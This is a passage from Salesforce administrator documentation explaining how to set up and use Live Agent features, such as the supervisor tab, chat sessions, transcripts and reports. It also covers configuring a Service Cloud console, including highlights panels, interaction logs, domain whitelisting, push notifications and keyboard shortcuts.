Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

Access to the Live Agent Supervisor tab in a user profile or
permission set

To use the Live Agent Supervisor page:

The Live Agent Supervisor page makes it easy to find information about your department’s chat buttons and chat agents, all
in one place.

To access the Supervisor page, click the Live Agent Supervisor tab. From there, you can:

• See a list of all of your organization’s active chat buttons, with information on the length of each button’s queue and longest
wait time. Click a button’s name to see its detail page.

Note:  Queue length and wait time information is only available for buttons with queueing enabled. Buttons
without queueing will show a queue length of 0 and N/A as the time of the longest wait.

• See a list of all of your organization’s chat agents, along with their statuses, the number of their active chat sessions, how
many chats they are currently engaged in, how many chats they are assigned to but haven’t yet accepted, how long they’ve
been logged in to Live Agent, and how long it’s been since they last accepted a chat request.

◊ Click an agent’s name or ID to view their profile page.
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◊ Click  next to an agent’s name to see a detailed list of their current chat sessions.
◊ To see only agents with a certain skill, choose the skill from the drop-down on the right side of the page.

◊ Use the links in the Action column to change an agent’s status:

ResultsThese Actions Are AvailableIf the Agent’s Status Is

Offline

Away

Available - Offline: Logs the agent out of the
chat console. Agents who are
logged out can’t accept incoming
chat request.

- Away: Sets the agent’s status to
Away but keeps them logged in to
the chat console. Agents who are
away can’t accept new chat
requests.

Logs the agent out of the chat console.
Agents who are logged out can’t accept
incoming chat request.

OfflineAway

Note:  You can’t change the
status of agents who are
offline.

◊ Monitor an agent’s chats with customers in the ongoing chat window on the right side of the Agent Status panel.

◊ Send “whisper messages” to agents in the ongoing chat window while they chat with customers. Customers can’t see
these messages, so you can privately chat with agents while they interact with customers.

See Also:
Live Agent Home

Live Agent Sessions Overview
Live Agent sessions help you monitor and view information on your agents’ chats with customers.

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

Every time your agents log into Live Agent, a Live Agent session record is automatically created. These session records store
information about your agents’ and customers’ interactions online, such as how many chat requests were processed, how long
agents spent online, or how long agents were actively engaged in chats with customers.
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You can associate session records with cases, accounts, contacts, and leads or link them with other objects through custom
lookup fields.

You can use Live Agent sessions to make it easy to find and edit information about your support agents’ chats with customers.
For example, you can create a list called “Today’s Sessions” to view chat activity that occurred in one day.

To access Live Agent sessions, click the Live Agent Sessions tab. From here, you can:

• See a list of recently viewed session records.

• Create a list of information about chat sessions—for example, the names of the agents involved in the session, agents’ login
times, and agents’ logout times.

• Change information in a session record by clicking Edit next to a record in a list.

Note:  You can edit custom fields on a Live Agent session record, but you can’t edit standard fields.

See Also:
Setting Live Agent Sessions Tab Visibility through Permission Sets
Setting Live Agent Sessions Tab Visibility through Profiles
Customizing Live Agent Sessions
Adding Tabs for Frequently Used Items

Customizing Live Agent Sessions
Customize Live Agent sessions to help your users monitor and view information on agents’ chats with customers.

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

On the Live Agent Sessions tab, your users can see information about support agents’ chats with customers.

You can customize Live Agent sessions according to your business needs. From Setup, click Customize > Live Agent > Live
Agent Sessions. From here, you can:

• Customize the fields that appear on a session page.

• Create validation rules for the fields that appear on a session page to prevent users from saving incorrect data in those
records.

• Define triggers to prompt actions for session records, such as updating another record automatically once a new session
record is stored.

• Create record types for different session records.

• Edit page layouts for session records.

• Customize buttons and links for sessions.
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• See a list of limits that apply to sessions in your organization.

See Also:
Customizing Fields
Defining Validation Rules
Customizing Page Layouts
Defining Custom Buttons and Links
About the Standard Object Limits Page
Adding Tabs for Frequently Used Items

Setting Live Agent Sessions Tab Visibility through Permission Sets
Make the Live Agent Sessions tab visible to users who are assigned to certain permission sets.

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Manage Users”To set tab visibility for Live Agent features:

You can give Live Agent users access to the Live Agent Sessions tab through permission sets.

1. From Setup, click Manage Users > Permission Sets.
2. Click the name of a permission set or create a new permission set.
3. Click Object Settings.
4. Click Live Agent Sessions.
5. Click Edit.
6. In Tab Settings, select Available and Visible.
7. Click Save.

Alternatively, you can give users access to the Live Agent Sessions tab through profiles.

See Also:
Setting Live Agent Sessions Tab Visibility through Profiles
Adding Tabs for Frequently Used Items
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Setting Live Agent Sessions Tab Visibility through Profiles
Make the Live Agent Sessions tab visible to users who are assigned to certain profiles.

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Manage Users”To set Live Agent Sessions tab visibility:

You can give Live Agent users access to the Live Agent Sessions tab through profiles.

1. From Setup, click Manage Users > Profiles.
2. Select a support agent profile.
3. Click Edit.
4. Set the visibility of the Live Agent Sessions tab to Default On.
5. Click Save.

Alternatively, you can give users access to the Live Agent Sessions tab through permission sets.

See Also:
Setting Live Agent Sessions Tab Visibility through Permission Sets
Adding Tabs for Frequently Used Items

Setting Up the Knowledge Chatlet and the Articles Tool
Describes the steps for setting up the Knowledge chatlet and the Articles tool to let agents search for articles from the Live
Agent console or from Live Agent in the Service Cloud console.

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”

AND

“Manage Salesforce Knowledge”

To set up the Live Agent Knowledge chatlet or Articles tool:
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To give support agents the ability to include information from Salesforce Knowledge articles in chat sessions using the
Knowledge chatlet or the Articles tool, you need to add a custom field called "Chat Answer" to article types. This field stores
information from the article that's appropriate to share with customers during a live chat. This can be especially helpful for
articles that are too long for an agent to include easily in a response.

Create the custom field as a Text, Text Area, or Text Area (Long). The Rich Text Field option is not supported. Remember
that you need to add this custom field to each article type containing information that you want operators to access from the
Knowledge chatlet.

To set up the Chat Answer field:

1. From Setup, click Customize > Knowledge > Article Types.
2. Create a new article type or edit an existing one.
3. Click New in the Fields related list.
4. Select Text, Text Area, or Text Area (Long).

Don't select Text Area (Rich).

5. Click Next.
6. Enter Chat Answer in Field Label.

Make sure that Field Name is populated automatically with Chat_Answer. The field name must be Chat_Answer. However,
you can use a different name for the Field Label.

7. Click Next.
8. Specify security settings and click Next.

Make the Chat Answer field visible to authors, editors, and live chat agents. Hide it from portal users or other users who
don't need access to it.

9. Select Yes, add this custom field to the layout, and click Save.

See Also:
Setting Up Live Agent

Setting Up Live Chat Transcripts

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To set up Live Chat Transcripts:

The Live Chat Transcripts tab contains the transcripts of completed chat sessions. Depending on your organization's
requirements, you may want to customize the Live Chat Transcripts tab to display or hide standard fields, manage security,
add custom fields, add buttons or links, or more.

To set up the tab:
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1. Customize Live Chat Transcript fields.
This lets users add additional information to Live Chat Transcript records.

2. Customize Live Chat Transcript page layouts.
This lets you specify which fields display to users.

3. Set field-level security on Live Chat Transcript fields.
This lets you choose which fields users can access.

4. Add the Live Chat Transcript tab to an app.
This lets users view the tab from a specific app.

5. Optionally, set up validation rules to prevent users from saving incorrect data.

See Also:
Setting Up Live Agent
Live Chat Transcript Events

Setting Up Live Chat Visitors

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To set up Live Chat Visitors:

The Live Chat Visitor tab contains information about visitors that have participated in chat sessions. Depending on your
organization's requirements, you may want to customize the Live Chat Visitor tab to display or hide standard fields, manage
security, add custom fields, add buttons or links, or more.

To set up the tab:

1. Customize Live Chat Visitor fields.
This lets users add additional information to Live Chat Visitor records.

2. Customize Live Chat Visitor page layouts.
This lets you specify which fields display to users.

3. Set field-level security on Live Chat Visitor fields.
This lets you choose which fields users can access.

4. Add the Live Chat Visitor tab to an app.
This lets users view the tab from a specific app.

5. Optionally, set up validation rules to prevent users from saving incorrect data.

See Also:
Setting Up Live Agent
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Setting Live Agent Supervisor Tab Visibility through
Profiles

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Manage Users”To set tab visibility for Live Agent features:

You can give Live Agent users access to the Supervisor tab through either profiles or permission sets.

To use a profile:

1. From Setup, click Manage Users > Profiles.
2. Select a support agent profile.
3. Depending on which user interface you're using, do one of the following:

• Enhanced profile user interface—In the Find Settings... box, enter the name of the tab you want and select it from
the list, then click Edit.

• Original profile user interface—Click Edit, then scroll to the Tab Settings section.

4. Set the visibility of the Live Agent Supervisor tab to Default On.
5. (Original profile user interface only) To reset users’ tab customizations to the tab visibility settings that you specify, select

Overwrite users' personal tab customizations.
6. Click Save.

Alternatively, you can give users access to the Live Agent Supervisor tab through permission sets.

Setting Live Agent Supervisor Tab Visibility through
Permission Sets

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Manage Users”To set tab visibility for Live Agent features:

You can give Live Agent users access to the Supervisor tab through either profiles or permission sets.

To use a permission set:
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1. From Setup, click Manage Users > Permission Sets.
2. Click the name of a permission set or create a new permission set.
3. Click Object Settings.
4. Click Live Agent Supervisor.
5. Click Edit.
6. In Tab Settings, select Available and Visible.
7. Click Save.

Alternatively, you can give users access to the Live Agent Supervisor tab through profiles.

Pre-Chat Forms and Post-Chat Pages
Creating pre-chat forms and post-chat pages in Live Agent makes it easy to exchange information with customers who contact
your company through chat.

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

Pre-chat forms and post-chat pages offer a standardized way of collecting information from customers who contact your
company through chat and then sharing information with them after their chat sessions are finished. In addition, these forms
and pages let you customize the chat experience for your users.

You can create a pre-chat form to gather information, such as a customer’s name, email address, and reason for contacting
customer support. This information can help direct chat requests more efficiently and can reduce the amount of time agents
need to spend collecting information before beginning a chat session.

Note:  If a chat is disconnected after the customer completes a pre-chat form, the pre-chat data may be lost when
the chat connection is reestablished.

Post-chat pages let you share information, such as chat transcripts, with customers at the end of a chat session. You can also
customize the post-chat experience in other ways, such as offering options for follow-up support and asking customers to
complete a survey.

For information on creating customized pre-chat forms and post-chat pages, see the Live Agent Developer’s Guide.
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Reporting on Live Agent Sessions

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

You can create a custom report type for Live Agent chat sessions and use it to run reports on your agents’ sessions using the
Report Builder. These Live Agent session reports can provide insight about your agents’ chat activities—for example, whether
or not your agent team is able to handle all chat requests from your customers.

1. Create a custom report type using Live Agent Sessions as the primary object.
2. Create a new Live Agent report using the Report Builder.
3. Customize your report to include the columns of information you want to feature.
4. Save or run the report.

See Also:
Create a Custom Report Type
Create a Report
Run a Report
Build a New Report
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SETTING UP THE SUPPORT AGENT EXPERIENCE

SETTING UP A UNIFIED HELP DESK

SERVICE CLOUD CONSOLE

Setting Up a Service Cloud Console
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To set up a Service Cloud console:

To set up a Service Cloud console:

1. Customize highlights panels for all objects.
2. Create an app for your Service Cloud console and assign it to user profiles.
3. Set up interaction logs.
4. Assign interaction logs to user profiles.
5. Choose how lists display.
6. Whitelist domains.
7. Customize push notifications.
8. Customize keyboard shortcuts.
9. Set up call center with version 4.0 of the CTI Toolkit.

Call center users can only use a SoftPhone in a Service Cloud console if they're using a CTI adapter built with version 3.0
or 4.0 of the CTI Toolkit; or if they’re using a call center built with the Open CTI.

10. Optionally:

• Save user sessions automatically.
• Turn on the Knowledge sidebar.
• Turn on Live Agent.

11. Assign users the Service Cloud User feature license.
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Note: Advanced administrators and developers can use the Service Cloud Console Integration Toolkit, or custom
console components, to implement custom functionality for the console. See Custom Console Components Overview
on page 2128.

See Also:
Administrator setup guide: Service Cloud Console Implementation Guide
Service Cloud Console Implementation Tips

Customizing Highlights Panels for a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To customize page layouts:

“View Setup”To view page layouts:

The highlights panel is a table of up to four columns at the top of every primary tab in a Service Cloud console. It lets console
users view key information at a glance. Each of its columns has one or two fields that you can customize to suit your business
needs.

To edit a highlights panel, hover over the highlights panel on any page layout and click  (or double-click the highlights
panel).

• To add or change fields, click the appropriate column and select fields from the Top Field and Bottom Field lists:

◊ Fields must also be on the detail page layout. If the fields you want to add aren't listed, add them to the detail page
layout.

◊ Rich text area (RTA) and custom long-text area fields are not supported in the highlights panel, even if they are included
in the detail page layout.

◊ Fields can appear once per highlights panel. Fields already in use appear grey in the field-selection lists.

• To remove fields, click the appropriate column and select -None- from the field-selection lists.

• To add columns, click Add Column.

•
To remove columns, hover over the column and click .

• To save highlights panel changes, click OK in the Highlights Panel Properties dialog box. When you've finished editing
the page layout, click Save. Don't navigate away from the page layout before clicking Save or you'll lose your changes.
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To display highlights panels, you must turn them on.

See Also:
Turning On Highlights Panels
Highlights Panel Fields and Format
Setting Up a Service Cloud Console

Turning On Highlights Panels

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To customize page layouts:

“View Setup”To view page layouts:

The highlights panel is a table of up to four columns at the top of every primary tab in a Service Cloud console. It lets console
users view key information at a glance. Each of its columns has one or two fields that you can customize to suit your business
needs. To display highlights panels, you must turn them on.

1. Edit any page layout and click Layout Properties.
2. Check Highlights Panel, and click OK.
3. Click Save.

See Also:
Highlights Panel Fields and Format
Setting Up a Service Cloud Console

Highlights Panel Fields and Format

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To customize page layouts:

“View Setup”To view page layouts:

The highlights panel is a table of up to four columns at the top of every primary tab in a Service Cloud console. It lets console
users view key information at a glance. Each of its columns has one or two fields that you can customize to suit your business
needs.
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The highlights panel displays standard and custom fields, and columns. The following formatting rules apply:

• Standard and custom fields

◊ Fields must also be on the detail page layout

◊ Fields can appear once per highlights panel

• Columns—minimum one, maximum four. Column widths resize automatically.

• Fields per column—one or two, in top or bottom positions.

When users see the highlights panel:

◊ Top fields appear in bold and in a larger font than bottom fields.

◊ Blank fields appear as follows:

- Top fields—appear blank (except when top fields are blank because users don't have permission to view them).

- Bottom fields—the top field expands to fill the column

- Both fields—the column appears blank

• Users see only the fields that they have permission to view.

If users can't see:

◊ Top fields—the bottom field replaces the top field and expands to fill the column

◊ Bottom fields—the top field expands to fill the column

◊ Any fields in a column—the column is removed

See Also:
Customizing Highlights Panels for a Service Cloud Console
Turning On Highlights Panels

Creating a Service Cloud Console App

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“View Setup and Configuration”To view apps:

“Customize Application”To manage apps:

Watch a Demo: Setting Up a Service Cloud Console (2:20 minutes)

You create a Service Cloud console as a custom app that users select from the Force.com app menu. The number of Service
Cloud console apps you can create is based on your custom app limits.
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1. From Setup, click Create > Apps.
2. Click New.
3. Select Service Cloud console and click Next.
4. Specify a label for the app. The label can have a maximum of 40 characters, including spaces. This label is the app’s name

in the Force.com app menu.
5. Optionally, enter a description of the app.
6. Click Next.
7. Optionally, specify a custom logo for the app. Click Insert an image to choose an image file from the document library.

Consider these requirements when choosing a custom app logo from the document library:

• The image must be in GIF or JPEG format and less than 20 KB in size.
• If the image is larger than 300 pixels wide by 55 pixels high, then it will be scaled to fit.
• For the best on-screen display, we recommend you use an image with a transparent background.
• The Externally Available checkbox must be selected on the document’s properties so that users can view the

image.

8. Click Next.
9. Select the items to include in the navigation tab. For example, if you want users to choose accounts from the navigation

tab, move Accounts from Available Navigation Tab Items to Selected Navigation Tab Items.

• Click the left and right arrow buttons to add or remove items.
• Click the up and down arrow buttons to define the order in which items display on the navigation tab when it's clicked.

Note:

• You can't add the following to the navigation tab: forecasts, ideas, answers, connections, portals, console,
home, activities (tasks and events), or buttons for customizing your organization.

• Tab visibility settings, and the Overwrite users' personal tab customizations setting, don't
apply to the navigation tab. For example, users can access Accounts from the navigation tab even if Accounts
are Tab Hidden on user profiles.

10. Click Next.
11. Choose how items display in the console when they're not selected from a primary tab or subtabs. For example, when users

select cases from list views, search results, or screen pops, you can choose whether cases display as primary tabs or as subtabs
on parent records.

Next to an object, click:

• As a primary tab to display the object's records as primary tabs.
• As a subtab of to display the object's records as subtabs. From the drop-down list, choose the parent record where

the subtabs will appear. For example, if you want cases to appear as subtabs on contacts, select Contact Name (Contact)
in the Cases row. If parent records don't apply, subtabs appear as primary tabs. For example, if you make campaigns a
subtab of leads but a lead doesn't belong to a campaign, that campaign appears as a primary tab.

12. Click Next.
13. Optionally, if your organization has Live Agent enabled, select Include Live Agent in this App to enable a chat

workspace for Live Agent users in the console. After you select this checkbox, you can:

• Choose records or pages to open as subtabs of chat sessions.
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• Select Include Suggested Articles from Salesforce Knowledge in Live Agent to display the articles
tool in the chat workspace.

14. Click Next.
15. Assign the Service Cloud console to user profiles:

a. Check the Visible box to choose the user profiles for which the app will be available.
b. Check the Default box to set the app as that profile’s default app. This means that new users who have the profile

will see this app when they log in for the first time. Profiles with limits are excluded from this list.

16. Click Save.

Tip: You must refresh your browser to see any setup changes to a Service Cloud console.

See Also:
Setting Up a Service Cloud Console

Setting Up Interaction Logs for a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To set up interaction logs:

An interaction log lets Service Cloud console users write notes on records that appear on primary tabs.

You can create multiple interaction logs and customize them to display specific task fields for different users to update.

1. From Setup, click Create > Interaction Log Layouts.
2. Click New.
3. Name the interaction log.
4. Select task fields to add to the interaction log and click Add.

• * indicates required fields.
• You can only add editable task fields to interaction logs.
• The Enter your notes here... field is automatically added to all interaction logs; you can't remove it.

5. If you want this interaction log to be the default for all users, select Set as default layout.

You can't delete a default interaction log; you must first mark another interaction log as the default for your organization.

6. Click Save.

After you set up or customize interaction logs, you can assign them to different user profiles and turn them on to display.
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Tip:  You can create custom fields for tasks and add them to interaction logs. For example, you can create a Caller
Disposition picklist with values of Angry, Neutral, and Satisfied.

See Also:
Assigning Interaction Logs
Turning On Interaction Logs
Setting Up a Service Cloud Console

Assigning Interaction Logs

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To assign interaction logs:

An interaction log lets Service Cloud console users write notes on records that appear on primary tabs.

After you set up or customize interaction logs, you can assign them to different user profiles.

1. From Setup, click Create > Interaction Log Layouts.
2. Click Log Layout Assignment.
3. Choose an interaction log to assign to each user profile.
4. Click Save.

Note:  You can't assign interaction logs to portal user profiles because Service Cloud console apps aren’t available to
portal users.

See Also:
Setting Up Interaction Logs for a Service Cloud Console
Turning On Interaction Logs
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Turning On Interaction Logs

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To turn on interaction logs:

An interaction log lets Service Cloud console users write notes on records that appear on primary tabs. For example, when
cases appear on primary tabs, an interaction log can appear so that users can take notes on cases. To display interaction logs,
you must turn them on for page layouts assigned to different user profiles.

1. Edit any page layout and click Layout Properties.
2. Check Interaction Log and click OK.
3. Click Save.

Note:  If you turn interaction logs on or off, you must close and reopen records to see the changes.

See Also:
Assigning Interaction Logs
Setting Up Interaction Logs for a Service Cloud Console

Choosing How Lists Display in a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To choose how lists display:

In a Service Cloud console, you can display lists in one of three ways:

DescriptionList Type

Lists are visible only when the navigation tab is selected. When
you select a record from the list, it opens in a new tab.

Full screen, unpinned

Lists appear at the top of the page and are always visible.
When you select a record from the list, it opens in a new tab
below the list.

Pinned to top
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DescriptionList Type

Lists appear on the left side of the page and are always visible.
When you select a record from the list, it opens in a new tab
to the right of the list.

Pinned to left

To change how lists display:

1. From Setup, click Create > Apps.
2. Select a Service Cloud console app.
3. Click Edit.
4. Choose how you want lists to display. If you choose pinned lists, specify a default size, in pixels or percentage of screen

space.
5. Click Save.

Note:  If a user hasn't yet selected a record from a list, the list automatically displays full screen.

See Also:
Resizing and Minimizing Pinned Lists in a Service Cloud Console

Whitelisting Domains for a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To whitelist domains for a Service Cloud console:

You can allow users to access domains outside of Salesforce from within a Service Cloud console. For example, you can add
www.example.com to a console’s whitelist so that console users can access that domain.

1. From Setup, click Create > Apps.
2. Select a Service Cloud console app.
3. Click Edit.
4. In Whitelist Domains, type the domains you want users to access, and separate multiple domains by commas. You

don’t need to enter http:// or https:// because those are part of a URL, not a domain.
5. Click Save.

See Also:
Setting Up a Service Cloud Console
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Customizing Push Notifications for a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To customize push notifications:

Push notifications are visual indicators on lists and detail pages in a Service Cloud console that show when a record or field
has changed during a user’s session. For example, if two support agents are working on the same case and one agent changes
the Priority, a push notification displays to the other agent so he or she notices the change and doesn’t duplicate the effort.

To choose when push notifications display and which objects and fields are trigger push notifications:

1. From Setup, click Create > Apps.
2. Select a Service Cloud console app.
3. Click Edit.
4. In Choose How Lists Refresh, select when push notifications occur:

DescriptionOption

Lists don’t refresh. Push notifications don’t occur.None

The entire list refreshes when there are any changes to it.
Records are added to or removed from the list based on the
list’s criteria.

Refresh List

Rows in the list refresh when there are any changes to fields
specified for push notifications.

Refresh List Rows

5. In Choose How Detail Pages Refresh, select when push notifications occur:

DescriptionOption

Detail pages don’t refresh. Push notifications don’t occur.Do Not Refresh

The detail page automatically refreshes when a record is
changed.

Automatically Refresh

A message appears on the detail page when a record is
changed.

Flag

6. Click Select objects and fields for notifications.
7. Click Edit.
8. Select the objects you want to trigger push notifications. For example, if you want changes to cases and case fields to trigger

push notifications, move Cases from Available Items to Selected Items.
9. Under Fields, click Edit to select the object fields you want to trigger push notifications.
10. Click OK.
11. Click Save.
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Note: The following objects and their fields are available for push notifications:

• Custom objects
• Cases
• Accounts
• Contacts
• Leads
• Campaigns
• Opportunities
• Tasks

See Also:
Setting Up a Service Cloud Console
Managing Apps

Customizing Keyboard Shortcuts for a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To customize keyboard shortcuts for a Service Cloud console:

Keyboard shortcuts let users perform actions by pressing a combination of keys instead of having to use a mouse. Keyboard
shortcuts can make working with a Service Cloud console more efficient. For example, instead of typing case details and then
using a mouse to click Save, you can create a keyboard shortcut so that users can type case details and press CTRL+S.

Once you enable keyboard shortcuts for a console, several default shortcuts are available for customization, such as opening
and closing tabs, moving between tabs, and saving records. Before you can create custom shortcuts, a developer must define
the shortcut’s action with the addEventListener() method in the Service Cloud Console Integration Toolkit. You can’t
create keyboard shortcuts for actions performed outside of the console.

To enable and customize keyboard shortcuts:

1. From Setup, click Create > Apps.
2. Click Edit next to a Service Cloud console app.
3. Click Customize keyboard shortcuts.
4. Click Edit on the top of the page.
5. Select Enable keyboard shortcuts.
6. Edit an existing keyboard shortcut or create a new one:

• To edit a shortcut, click Edit next to the shortcut, type the combination of key commands to use, and click OK.
• To create a shortcut, click +Add Keyboard Shortcut, type the action the shortcut will perform, a Console Event

Name, which is a unique identifier, the combination of key commands to use, and click OK. For the new shortcut to
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work, you must send the Console Event Name to the developer who defined your shortcut’s action so that he or
she can add it to the method that will trigger your shortcut.

• To deactivate a shortcut, deselect Active next to the shortcut’s name. You can’t delete the default shortcuts provided
by Salesforce, but you can edit or deactivate them.

7. Click Save.

After you’ve customized keyboard shortcuts for a console, notify users assigned to that console about the actions they can
perform.

Note:

• You can have up to 144 shortcuts for each console, which includes the default shortcuts provided by Salesforce
and any you create.

• Keyboard shortcuts aren’t case sensitive, even if you press SHIFT before a letter key. For example, SHIFT+b is
the same as SHIFT+B.

• If CTRL, ALT, or SHIFT is in a keyboard shortcut, the sequence of those keys doesn’t matter. For example,
CTRL+ALT+A is the same as ALT+CTRL+A.

• If you create or customize keyboard shortcuts to include standard browser shortcuts, such as CTRL+F, your
shortcuts might not work as intended.

Tip:  You can include as many keys in a shortcut as you want, but we recommend that you limit a shortcut to three
keys so that users can easily remember it.

See Also:
Setting Up a Service Cloud Console
Default Keyboard Shortcuts for a Service Cloud Console

Default Keyboard Shortcuts for a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

After an administrator enables keyboard shortcuts for a Service Cloud console, the following shortcuts display automatically
and are available for customizing.

Key CommandDescriptionAction (Keyboard Shortcut)

ESCActivates keyboard shortcuts in a browser displaying a Service
Cloud console.

Focus keyboard shortcuts on
the console

VSelects the navigation tab.Go to the navigation tab

SHIFT+SSelects details on a tab.Go to tab details

PSelects the row of primary tabs.Go to the primary tabs

SSelects the row of subtabs on a primary tab.Go to the subtabs

NSelects the list view.Go to list view
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Key CommandDescriptionAction (Keyboard Shortcut)

SHIFT+FSelects the first item on the list view.Go to the first list view item

RMoves the cursor to the header search box.Go to header search box

LEFT ARROWMoves the cursor left.Move left

RIGHT ARROWMoves the cursor right.Move right

UP ARROWMoves the cursor up.Move up

DOWN ARROWMoves the cursor down.Move down

DOpens the drop-down button on tabs to select more actions.Open drop-down button on
tabs

TOpens a new tab.Open tab

CCloses a selected tab.Close tab

SHIFT+RRefreshes a selected tab.Refresh tab

ENTERActivates a command.Enter

UOpens the Link to Share dialog box on the selected tab.Get link to share

ESwitch from detail to edit page.Edit

CTRL+SSaves changes to the selected tab.Save

Saving User Sessions for a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To save user sessions for a Service Cloud console:

If a Service Cloud console is set up, you can choose to save user sessions so that when console users close their browsers or log
out of Salesforce, any previously open navigator tabs, primary tabs, or subtabs automatically display when they log in again.
Additionally, if console users resize an interaction log or any sidebar components, such as pinned lists; or they close the global
search header, those customizations automatically display when users log in again. This helps users to continue working from
where they last left off in a console without having to start from scratch.

1. From Setup, click Create > Apps.
2. Select a Service Cloud console app.
3. Click Edit.
4. Click Save User Sessions.
5. Click Save.
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Repeat these steps for each console.

See Also:
Setting Up a Service Cloud Console

Turning on the Knowledge Sidebar for a Service Cloud Console

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To turn on the Knowledge sidebar:

If Salesforce Knowledge is set up, you can turn on the Knowledge sidebar so that when console users work on a case, titles of
articles that might solve the case display automatically. Articles display based on any matching words typed in the case’s
Subject.

1. From Setup, click Customize > Cases > Page Layouts.
2. Click Edit next to a page layout.
3. Click Layout Properties.
4. Check Knowledge Sidebar, and click OK.
5. Click Save.

Repeat these steps for each case page layout assigned to console users.

See Also:
Setting Up a Service Cloud Console
Setting Up Salesforce Knowledge

Adding Live Agent to the Service Cloud Console

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To add Live Agent to the Service Cloud console:

After you set up Live Agent, you can use the steps below to add it to an existing Service Cloud console app. To create a new
app that includes Live Agent, see Creating a Service Cloud Console App.
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1. From Setup, click Create > Apps.
2. Click Edit next to the name of the Service Cloud console app in which you want to set up Live Agent.
3. Select Include Live Agent in this App.
4. Choose the records or pages you want to open as subtabs of chat sessions in the chat workspace.
5. Optionally, if your organization has Salesforce Knowledge enabled, select Include Suggested Articles from

Salesforce Knowledge in Live Agent to display the articles tool in the chat workspace.
6. Click Save.

Note:

• For best performance, we recommend using Internet Explorer 8, 9, or 10 or the latest stable version of Firefox or
Google Chrome when using Live Agent in the Service Cloud console.

• If you log in to another Salesforce app while you’re logged in to a Service Cloud console app, you can’t accept new
chat requests.

• Live Agent API limits apply when you use Live Agent in the Service Cloud console.

See Also:
Setting Up a Service Cloud Console
Setting Up Live Agent

Assigning the Service Cloud Feature License to Users

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Manage Users”To assign the Service Cloud User feature license to users:

The Service Cloud User feature license entitles users to additional Salesforce features, such as the Service Cloud console.

To assign the license to a user:

1. From Setup, click Manage Users > Users.
2. Click Edit next to a user's name.
3. Select Service Cloud User.
4. Click Save.

See Also:
Setting Up a Service Cloud Console
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Service Cloud Console Implementation Tips

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

• Only users assigned the Service Cloud User feature license can use a Service Cloud console. In order to use Live Agent in
a Service Cloud console, users also need to be assigned the Live Agent User feature license.

• A Service Cloud console app respects all of the security and sharing settings in your Salesforce organization.

• You can review an out-of-the box Service Cloud console by selecting Sample Console from the Force.com app menu.
Administrators can customize the Sample Console and give users access to it in Setup by clicking Create > Apps.

• Users see the new user interface theme on all pages in a Service Cloud console even if the theme isn't enabled for your
organization (the new user interface isn't applied to any pages outside of a Service Cloud console unless it's enabled).

• The number of Service Cloud console apps you can create is based on your custom app limits.

• The interaction log only displays on items that have an Activity History related list, such as accounts and contacts (but not
solutions). The interaction log isn't available for items like reports, dashboards, Salesforce CRM Content, the Article
Management tab, or Visualforce pages that display as primary tabs.

• You must refresh your browser to see any setup changes to a Service Cloud console.

• You can't add a Service Cloud console to partner portals or customer portals.

• An isdtp parameter is added to URLs in a Service Cloud console so that pages within it render correctly. For example,
https://www.salesforce.com/003/o?isdtp=v4. Salesforce recommends that you add the isdtp parameter to
any custom links users might click in the console.

• Advanced administrators and developers can use the Service Cloud Console Integration Toolkit, or custom console
components, to implement custom functionality for the console. See Custom Console Components Overview on page 2128.

• So that users can easily recognize the correct console, we recommend naming Service Cloud console apps after their
function. For example, Customer Service Desk.

• When setting up a Service Cloud console, pick the center of your business process as a primary tab, and related items as
